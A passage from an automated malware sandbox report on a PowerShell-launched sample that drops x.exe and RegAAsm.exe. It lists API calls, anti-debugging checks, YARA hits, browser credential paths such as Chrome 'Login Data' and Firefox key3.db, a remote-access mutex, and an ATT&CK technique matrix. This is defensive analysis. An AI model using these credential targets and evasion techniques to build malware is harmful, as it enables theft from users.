                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 830000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 1B540000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,4_2_0041A941
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3220Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 785Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeWindow / User API: threadDelayed 1992Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeWindow / User API: threadDelayed 7998Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-47689
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7404Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2180Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 1948Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe TID: 7564Thread sleep count: 1992 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe TID: 7564Thread sleep time: -5976000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe TID: 7564Thread sleep count: 7998 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe TID: 7564Thread sleep time: -23994000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,4_2_004090DC
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040B6B5
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,4_2_0041C7E5
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040B8BA
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0044E989 FindFirstFileExA,4_2_0044E989
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,4_2_00408CDE
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00419CEE
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,4_2_00407EDD
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00406F13 FindFirstFileW,FindNextFileW,4_2_00406F13
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,4_2_00407357
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                      Source: RegAAsm.exe, 00000004.00000003.1536498847.0000000000712000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000002.3887556228.0000000000712000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: RegAAsm.exe, 00000004.00000002.3887419828.000000000068E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                      Source: x.exe, 00000003.00000002.1511855850.000000000090E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeAPI call chain: ExitProcess graph end nodegraph_4-48714
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0043B88D
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0041D0CF LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,4_2_0041D0CF
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_004438F4 mov eax, dword ptr fs:[00000030h]4_2_004438F4
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00411999 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,4_2_00411999
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00435398 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00435398
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0043B88D
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00434D6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00434D6E
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00434F01 SetUnhandledExceptionFilter,4_2_00434F01
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_004197D9 mouse_event,4_2_004197D9
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAAsm.exe "C:\Users\user\AppData\Local\Temp\RegAAsm.exe" Jump to behavior
                      Source: RegAAsm.exe, 00000004.00000002.3887556228.0000000000703000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: RegAAsm.exe, 00000004.00000002.3887556228.0000000000703000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4kF
                      Source: RegAAsm.exe, 00000004.00000002.3887556228.0000000000703000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager#kU
                      Source: RegAAsm.exe, 00000004.00000002.3887419828.000000000068E000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000002.3887419828.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000002.3887419828.00000000006CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                      Source: RegAAsm.exe, 00000004.00000002.3887556228.0000000000703000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerpk
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00435034 cpuid 4_2_00435034
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: GetLocaleInfoA,4_2_0040F26B
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: EnumSystemLocalesW,4_2_004520E2
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: EnumSystemLocalesW,4_2_00452097
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: EnumSystemLocalesW,4_2_0045217D
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_0045220A
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: EnumSystemLocalesW,4_2_0044844E
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: GetLocaleInfoW,4_2_0045245A
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00452583
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: GetLocaleInfoW,4_2_0045268A
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00452757
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: GetLocaleInfoW,4_2_00448937
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_00451E1F
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\Desktop\cozzy.ps1 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00404961 GetLocalTime,CreateEventA,CreateThread,4_2_00404961
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0041BB0E GetComputerNameExW,GetUserNameW,4_2_0041BB0E
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_004491DA _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,4_2_004491DA
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3887419828.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 7332, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAAsm.exe PID: 7516, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPED
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data4_2_0040B59B
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\4_2_0040B6B5
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: \key3.db4_2_0040B6B5

                      Remote Access Functionality

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-7J4RV4Jump to behavior
                      Source: Yara matchFile source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3887419828.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 7332, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAAsm.exe PID: 7516, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPED
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: cmd.exe4_2_00405091
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                      Native API
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      2
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      22
                      Ingress Tool Transfer
                      Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts12
                      Command and Scripting Interpreter
                      1
                      Windows Service
                      1
                      Bypass User Account Control
                      1
                      Deobfuscate/Decode Files or Information
                      111
                      Input Capture
                      1
                      Account Discovery
                      Remote Desktop Protocol111
                      Input Capture
                      2
                      Encrypted Channel
                      Exfiltration Over Bluetooth1
                      Defacement
                      Email AddressesDNS ServerDomain Accounts2
                      Service Execution
                      Logon Script (Windows)1
                      Access Token Manipulation
                      2
                      Obfuscated Files or Information
                      2
                      Credentials In Files
                      1
                      System Service Discovery
                      SMB/Windows Admin Shares3
                      Clipboard Data
                      1
                      Remote Access Software
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts1
                      PowerShell
                      Login Hook1
                      Windows Service
                      1
                      Software Packing
                      NTDS4
                      File and Directory Discovery
                      Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                      Process Injection
                      1
                      DLL Side-Loading
                      LSA Secrets33
                      System Information Discovery
                      SSHKeylogging212
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Bypass User Account Control
                      Cached Domain Credentials121
                      Security Software Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading
                      DCSync31
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                      Virtualization/Sandbox Evasion
                      Proc Filesystem3
                      Process Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Access Token Manipulation
                      /etc/passwd and /etc/shadow1
                      Application Window Discovery
